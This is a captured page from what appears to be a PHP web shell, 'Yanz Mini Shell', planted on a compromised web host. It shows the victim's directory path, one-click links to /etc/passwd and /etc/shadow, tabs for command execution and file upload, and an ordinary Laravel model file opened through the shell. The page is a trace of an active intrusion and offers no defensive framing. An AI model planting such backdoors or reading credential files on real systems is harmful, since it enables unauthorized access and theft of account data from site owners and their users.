Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
firstmatrixcoin
public_html
ocean-arc.firstmatrix.co.in
admin-app
api
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
<?php namespace App; use Illuminate\Database\Eloquent\Model; class StockAdjustmentLine extends Model { /** * The attributes that aren't mass assignable. * * @var array */ protected $guarded = ['id']; public function variation() { return $this->belongsTo(\App\Variation::class, 'variation_id'); } public function lot_details() { return $this->belongsTo(\App\PurchaseLine::class, 'lot_no_line_id'); } }
Free Space : 11188019200 Byte